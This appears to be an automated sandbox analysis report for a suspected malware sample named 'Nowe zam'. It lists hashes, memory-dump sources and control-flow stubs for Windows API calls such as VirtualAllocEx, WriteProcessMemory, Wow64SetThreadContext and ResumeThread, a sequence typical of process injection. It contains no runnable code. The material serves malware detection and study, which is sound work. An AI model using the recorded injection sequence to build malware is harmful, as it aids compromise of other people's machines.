                                                                                                                • Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: b69c1ef5c3872edfca2b10b9f03f35c94b2a15c2e7ad7c5a487580850200b37f
                                                                                                                • Instruction ID: ca08f10f3f47b6199cddff24a4f31ae7c76ac9510eaae9f1819fe21187c21aba
                                                                                                                • Opcode Fuzzy Hash: b69c1ef5c3872edfca2b10b9f03f35c94b2a15c2e7ad7c5a487580850200b37f
                                                                                                                • Instruction Fuzzy Hash: 9641D271C0071DCBEB24DFA9C984BCDBBB5BF88714F24816AD408AB251D7B56946CF90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 187 9744c4-9759b9 CreateActCtxA 190 9759c2-975a1c 187->190 191 9759bb-9759c1 187->191 198 975a1e-975a21 190->198 199 975a2b-975a2f 190->199 191->190 198->199 200 975a31-975a3d 199->200 201 975a40 199->201 200->201 203 975a41 201->203 203->203
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 009759A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 8e775e364bf777d75598ecbe95e9869e11e0a27a2ac5ddced948665a03b08838
                                                                                                                • Instruction ID: 27a0cb0a0ef93e0bedc49c2729744ffe1c646f9858fd626cb3340b4865259aaf
                                                                                                                • Opcode Fuzzy Hash: 8e775e364bf777d75598ecbe95e9869e11e0a27a2ac5ddced948665a03b08838
                                                                                                                • Instruction Fuzzy Hash: E141F171C00B1DCBEB24DFA9C884B8DBBB5BF88304F20816AD408BB251DBB56945CF90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 204 90d1c38-90d1c86 206 90d1c88-90d1c94 204->206 207 90d1c96-90d1cd5 WriteProcessMemory 204->207 206->207 209 90d1cde-90d1d0e 207->209 210 90d1cd7-90d1cdd 207->210 210->209
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090D1CC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: fd347e09db9186b7e8e68f7c8af11c6ebda07f17137becc5f41d22122f19ef6d
                                                                                                                • Instruction ID: 7f2b67a1039e78a144da89d25fdb2eee2b8e16021d0805298e84fc94aaa53ea6
                                                                                                                • Opcode Fuzzy Hash: fd347e09db9186b7e8e68f7c8af11c6ebda07f17137becc5f41d22122f19ef6d
                                                                                                                • Instruction Fuzzy Hash: AE213971900349DFDB50DFA9D984BEEBBF5FF48310F10882AE918A7240D7789954CBA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 214 90d1c36-90d1c86 216 90d1c88-90d1c94 214->216 217 90d1c96-90d1cd5 WriteProcessMemory 214->217 216->217 219 90d1cde-90d1d0e 217->219 220 90d1cd7-90d1cdd 217->220 220->219
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090D1CC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 44a8f8054c2f84b2da0413b4df2bc8ee51ff0522f50817f9c3507a5c5e794cb1
                                                                                                                • Instruction ID: 54548fe1f9ae91a07bc985c1db71703bdba269e92f23958eb1bdd3b2075bbe08
                                                                                                                • Opcode Fuzzy Hash: 44a8f8054c2f84b2da0413b4df2bc8ee51ff0522f50817f9c3507a5c5e794cb1
                                                                                                                • Instruction Fuzzy Hash: EF2123B5900309CFDB50DFA9D984BEEBBF1FF48310F10882AE918A7240D7789954CBA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 224 97b128-97d7dc DuplicateHandle 226 97d7e5-97d802 224->226 227 97d7de-97d7e4 224->227 227->226
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D7CF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 8a2eb778c89e4b39242e62be99e93beb93bc896c9f10a91a2d014cd7ef2931db
                                                                                                                • Instruction ID: 485368c84708eca24cb19cbecb548dde41145f8b1a9a322278f2ea079a816853
                                                                                                                • Opcode Fuzzy Hash: 8a2eb778c89e4b39242e62be99e93beb93bc896c9f10a91a2d014cd7ef2931db
                                                                                                                • Instruction Fuzzy Hash: F021E5B590124CDFDB10DFA9D584ADEBBF4FB48310F14841AE918A3350D378A954CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 230 97d742-97d7dc DuplicateHandle 231 97d7e5-97d802 230->231 232 97d7de-97d7e4 230->232 232->231
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D7CF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: fb683f96f4c8b0d9016b659c383fe5a802d277e6d9f74d2085096bf74c1f192b
                                                                                                                • Instruction ID: 0051fadc8cd335689eeb2e22704a2f874c490f10ca2da73cf3fd3640e78e66b3
                                                                                                                • Opcode Fuzzy Hash: fb683f96f4c8b0d9016b659c383fe5a802d277e6d9f74d2085096bf74c1f192b
                                                                                                                • Instruction Fuzzy Hash: E121E0B5901248DFDB10CFAAD984ADEBFF4FB48320F14805AE918A7250D379A955CFA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 253 90d1d28-90d1db5 ReadProcessMemory 256 90d1dbe-90d1dee 253->256 257 90d1db7-90d1dbd 253->257 257->256
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090D1DA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 0e7ce8169166e917e7c397b77a32dc171242da9399c2b05016c663e77f60117f
                                                                                                                • Instruction ID: a0bfc03cb33f06ed09f0e7a3f1e297b8199ec7d194c32d38763eadff09ddffb0
                                                                                                                • Opcode Fuzzy Hash: 0e7ce8169166e917e7c397b77a32dc171242da9399c2b05016c663e77f60117f
                                                                                                                • Instruction Fuzzy Hash: D5215971C003099FDB10DFAAC884BDEBBF5FF48310F10852AE518A7240C7389904CBA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 245 90d1d23-90d1db5 ReadProcessMemory 248 90d1dbe-90d1dee 245->248 249 90d1db7-90d1dbd 245->249 249->248
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090D1DA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                • Opcode ID: 2ac5422c653e4d93504fd6ceb49afcdaddfdf2bf6089c958da4227ba09e76c67
                                                                                                                • Instruction ID: 5afd4ab81730ad6c7933d239bb55727b4e82a7fb0d5aff2ae4ec16b2362679c4
                                                                                                                • Opcode Fuzzy Hash: 2ac5422c653e4d93504fd6ceb49afcdaddfdf2bf6089c958da4227ba09e76c67
                                                                                                                • Instruction Fuzzy Hash: D1213471D013098FDB10DFA9D984AEEBBF5FF88310F10892AE519A7240C7399905CBA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 235 90d1aa0-90d1aeb 237 90d1aed-90d1af9 235->237 238 90d1afb-90d1b2b Wow64SetThreadContext 235->238 237->238 240 90d1b2d-90d1b33 238->240 241 90d1b34-90d1b64 238->241 240->241
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 090D1B1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: 305df1ecc2b3480faa45966f2f6ba1ba6b9a2ede47325f1846defcdc001326e0
                                                                                                                • Instruction ID: d55064a577612f505e0cd511bf45afda1369920296be323b6d2357467a410ae5
                                                                                                                • Opcode Fuzzy Hash: 305df1ecc2b3480faa45966f2f6ba1ba6b9a2ede47325f1846defcdc001326e0
                                                                                                                • Instruction Fuzzy Hash: 2C215B71D003098FDB50DFAAC4847EEBBF4EF88314F14842AE519A7240DB789945CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 261 90d1a9c-90d1aeb 263 90d1aed-90d1af9 261->263 264 90d1afb-90d1b2b Wow64SetThreadContext 261->264 263->264 266 90d1b2d-90d1b33 264->266 267 90d1b34-90d1b64 264->267 266->267
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 090D1B1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                • Opcode ID: c73a04c6ef25890f892f9f3114747aea13b147e7bd14339762d8e2eed8873776
                                                                                                                • Instruction ID: 97c81e43619547d6db9fce7a6a8ff7ac46b450fd00fb80a21fa5bb970b3c197a
                                                                                                                • Opcode Fuzzy Hash: c73a04c6ef25890f892f9f3114747aea13b147e7bd14339762d8e2eed8873776
                                                                                                                • Instruction Fuzzy Hash: 36218871D003098FEB50DFA9C4847EEBBF1AF48310F10882AE519A7240DB789949CFA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 271 90d1b78-90d1bf3 VirtualAllocEx 274 90d1bfc-90d1c21 271->274 275 90d1bf5-90d1bfb 271->275 275->274
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090D1BE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 2ff9273f2bf1e67e10f205a086ed947f3561938977a409d4172a5272c43c8936
                                                                                                                • Instruction ID: b9c7c51c095a7a75e13754aa2bdc05986698a2d22d594b9dcbdc341aca2de530
                                                                                                                • Opcode Fuzzy Hash: 2ff9273f2bf1e67e10f205a086ed947f3561938977a409d4172a5272c43c8936
                                                                                                                • Instruction Fuzzy Hash: B31167758003098FDB10DFAAD844BDFBBF5AF88320F10881AE515A7250CB79A944CFA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 279 90d19eb-90d1a5f ResumeThread 283 90d1a68-90d1a8d 279->283 284 90d1a61-90d1a67 279->284 284->283
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 3f4a874df3672da7a790a4d953344c0b03dea770ba95a155803ad18d43a69279
                                                                                                                • Instruction ID: b694dedc8d66ef2b49489e06861a8a3893461d92f9c646b0b388c3e4bce5b326
                                                                                                                • Opcode Fuzzy Hash: 3f4a874df3672da7a790a4d953344c0b03dea770ba95a155803ad18d43a69279
                                                                                                                • Instruction Fuzzy Hash: 8F115871D003498FEB14DFAAD8447DEBBF4AF88310F14881AD519A7240DB79A944CB91
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090D1BE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 700a1fc6e0e026bb1dad7f43150f93ab879098f4857621935722431285a16e96
                                                                                                                • Instruction ID: 4e14de09adad83aef846ac1af125e5a499eafc989088e79c84527edc1fd463ed
                                                                                                                • Opcode Fuzzy Hash: 700a1fc6e0e026bb1dad7f43150f93ab879098f4857621935722431285a16e96
                                                                                                                • Instruction Fuzzy Hash: 79114975900309CFDB10DFA9D944BDEBBF5AF48310F14881AE515A7250C7799554CF90
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: c931d714c6e64743452c16563d09c7b73ba36273a32e85b52a3cbd1d26320ede
                                                                                                                • Instruction ID: 5b1e8520f2e8e4b457ca0064ced9e0f3d449d12bc8ee3c8eeb310aab85933a13
                                                                                                                • Opcode Fuzzy Hash: c931d714c6e64743452c16563d09c7b73ba36273a32e85b52a3cbd1d26320ede
                                                                                                                • Instruction Fuzzy Hash: 39116671D003498FEB10DFAAD8447DEFBF4AF88310F14881AD519A7240CB79A944CBA0
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 090D5365
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: cdc09d5cf9185cc24457c9d6088348cab1e34a9140c14ebbe59bb2544c125c4c
                                                                                                                • Instruction ID: 81e7742e245dcffcccbc7aef2ea2ee930af4ae7d3c3dd1c84b0fb35fc42789dd
                                                                                                                • Opcode Fuzzy Hash: cdc09d5cf9185cc24457c9d6088348cab1e34a9140c14ebbe59bb2544c125c4c
                                                                                                                • Instruction Fuzzy Hash: 9011F5B5800349DFDB10DF99D984BDEBBF8EB48714F108859E918A7250D375A944CFA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0097B39E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 53b8ab82ee5642f3ce88882064db0228e70937b988a51f5f73569dee983d75a4
                                                                                                                • Instruction ID: 96fda4789b1d0c1872a08562635e2763493e22b041c48135bacb1b9398fc8e49
                                                                                                                • Opcode Fuzzy Hash: 53b8ab82ee5642f3ce88882064db0228e70937b988a51f5f73569dee983d75a4
                                                                                                                • Instruction Fuzzy Hash: 2D1110B6C007498FDB20DF9AD444BDEFBF8AB88310F10851AD819A7210D379A545CFA5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 090D5365
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                • Opcode ID: 0ac44d367477db41a54868de94c64ccd4b2d889c73945adfaf12e70b46ca520b
                                                                                                                • Instruction ID: 47f184751e35b03f711de01565de9357b9272bdc8d4f665ae2ec358b15f086bb
                                                                                                                • Opcode Fuzzy Hash: 0ac44d367477db41a54868de94c64ccd4b2d889c73945adfaf12e70b46ca520b
                                                                                                                • Instruction Fuzzy Hash: 3D1115B5800349CFDB10DF99D985BDEBBF4FB48320F14885AE918A7610C379A944CFA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 107b48e76557208d52fc306234adeed43766db3a9f4a2a4a9b5a3b3f78d0b63e
                                                                                                                • Instruction ID: 6cecc20174499c67a52f10b18d9bbbeaa21a254ba539c0096819f2c4cce22018
                                                                                                                • Opcode Fuzzy Hash: 107b48e76557208d52fc306234adeed43766db3a9f4a2a4a9b5a3b3f78d0b63e
                                                                                                                • Instruction Fuzzy Hash: 85D12D7590024ACFCF14DFA8C8948EDB7B5FF58314B648659D8167B259E730BA89CF80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 783ec5c7fc2eb8fe0cf2ff787fb76d645015b0f3e1e88b300f3a00cc8691a2ee
                                                                                                                • Instruction ID: 7ed48002908f7c4d82748ab96a6b5f4fc94eea05a3f27e174a91aa1536d442bb
                                                                                                                • Opcode Fuzzy Hash: 783ec5c7fc2eb8fe0cf2ff787fb76d645015b0f3e1e88b300f3a00cc8691a2ee
                                                                                                                • Instruction Fuzzy Hash: 3DB1407590024ACFCF05DFA8C8948DDB7B1FF48314B248699D815AB25ADB31F99ACF80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [Kn^
                                                                                                                • API String ID: 0-1331738579
                                                                                                                • Opcode ID: 6ddcbdac1cd80cea0369082e33617d0ec64ac47d4204793c442156418248c56c
                                                                                                                • Instruction ID: 84fd8178ee3081012e44215067eb689518d7c40b53ae01b9822441862a6b164a
                                                                                                                • Opcode Fuzzy Hash: 6ddcbdac1cd80cea0369082e33617d0ec64ac47d4204793c442156418248c56c
                                                                                                                • Instruction Fuzzy Hash: A331F4726003048FDB01EB78D84859BBBF2EF85314714C4AAD906DB362EF75E80A8B91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8CFB
                                                                                                                • API String ID: 0-1492579572
                                                                                                                • Opcode ID: 56a17be5e22793bb774f611ebc09a590c06033e67a373df90b4bb1adfeb8c23b
                                                                                                                • Instruction ID: 0c929242346d7700aa6aae7de006e40e16352584711dfd9165f19ad356a4f6da
                                                                                                                • Opcode Fuzzy Hash: 56a17be5e22793bb774f611ebc09a590c06033e67a373df90b4bb1adfeb8c23b
                                                                                                                • Instruction Fuzzy Hash: A611E674A11209CFEB44DFA4E9959EDBBB6FB88301B508555E406AB719DBB45C06CF00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: V
                                                                                                                • API String ID: 0-1342839628
                                                                                                                • Opcode ID: c8d90532458df50c3431087500ccd5ddd16c0c30bb8a12be8442e80245ed44c0
                                                                                                                • Instruction ID: 03cec509fc6fa72c4a4a35ad801fa219a7d4549f0043923a871da17e754b7f83
                                                                                                                • Opcode Fuzzy Hash: c8d90532458df50c3431087500ccd5ddd16c0c30bb8a12be8442e80245ed44c0
                                                                                                                • Instruction Fuzzy Hash: 2501C475E00609DFCB41EFA8C58589DBBF0EF49200B1585ABE859E7621E770AA45CF81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: '
                                                                                                                • API String ID: 0-1997036262
                                                                                                                • Opcode ID: 921e6d4eee0a0ecdef21d05ba1fac6ad4af47edd984f4457bde0024e493808ec
                                                                                                                • Instruction ID: baedc4096367f9a817dbc51e1e836f92c366a8f4a21ecbe887b179382a932631
                                                                                                                • Opcode Fuzzy Hash: 921e6d4eee0a0ecdef21d05ba1fac6ad4af47edd984f4457bde0024e493808ec
                                                                                                                • Instruction Fuzzy Hash: 74F055653082808FE711CA3994A57B83BA0AFC0605B8D00E6C001CF1F3DA24F84BC3A1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: V
                                                                                                                • API String ID: 0-1342839628
                                                                                                                • Opcode ID: 1f1e26a9180c0eb9d5218e4101012461c2b04d1aad9be39e488bb0b3cb09d4a8
                                                                                                                • Instruction ID: 6bd30ea907cd4cd3c22e16ba86d15eab365951bd3bd8d19d5d4dc0adc73e3e2e
                                                                                                                • Opcode Fuzzy Hash: 1f1e26a9180c0eb9d5218e4101012461c2b04d1aad9be39e488bb0b3cb09d4a8
                                                                                                                • Instruction Fuzzy Hash: 83E0DF353087418FD728CB28E88098A7FF1DF4934076985EAE088C7662D660FC0B8B40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BE
                                                                                                                • API String ID: 0-3883797181
                                                                                                                • Opcode ID: bc07e8baeae096ffb89faa9a5c556717c11ed8acea96eb5cb8d6eededc93e9d6
                                                                                                                • Instruction ID: 3ec2cb5bef766737bbb633aac6a14077bb02bf3a576356e12137273d5519c417
                                                                                                                • Opcode Fuzzy Hash: bc07e8baeae096ffb89faa9a5c556717c11ed8acea96eb5cb8d6eededc93e9d6
                                                                                                                • Instruction Fuzzy Hash: CEE01A74E1411ACFCB90CF69E8854AEBBF6FB49300B008826E126E3614EB70A506CF00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a8360d9012ec74e798cd489083456338f920437cd7ccc1715a0ac63685e65fc9
                                                                                                                • Instruction ID: 1bd5c2a76d3a2eda3f23e9409de7aca492cc65fea1f7f41d0716dbe021ba02e2
                                                                                                                • Opcode Fuzzy Hash: a8360d9012ec74e798cd489083456338f920437cd7ccc1715a0ac63685e65fc9
                                                                                                                • Instruction Fuzzy Hash: 1B724E31D00609CFDB14EF68C8986ADB7B1FF55310F4086A9D549AB265EF30AAC9CF81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e6f433da94b3a4bd72d50337059a5b4c42ec921ffb204d17d7593029ab77073f
                                                                                                                • Instruction ID: 487e1cc986680d3bee12fd1d1efff12b5bcd8138fbbf4e29c9427db7a616816b
                                                                                                                • Opcode Fuzzy Hash: e6f433da94b3a4bd72d50337059a5b4c42ec921ffb204d17d7593029ab77073f
